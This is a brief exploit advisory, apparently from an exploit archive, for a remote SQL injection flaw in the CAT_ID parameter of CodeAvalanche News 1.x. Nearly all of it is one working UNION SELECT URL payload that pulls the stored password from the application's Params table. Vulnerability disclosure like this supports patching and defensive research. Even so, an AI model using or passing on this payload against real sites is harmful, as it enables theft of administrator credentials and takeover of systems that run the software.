id: 1507
date: 02/15/2007
title: CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability
author: beks
cves: 

==================================================================
CodeAvalanche News 1.x (CAT_ID) Remote SQL Injection Vulnerability
==================================================================



#CodeAvalanche News SQL Injection#

Software: CodeAvalanche News

Risk: High

Found by: beks

http://target/[path]/inc_listnews.asp?CAT_ID=17+union+select+0,0,0,0,Password+from+Params



#  0day.today [2023-03-24]  #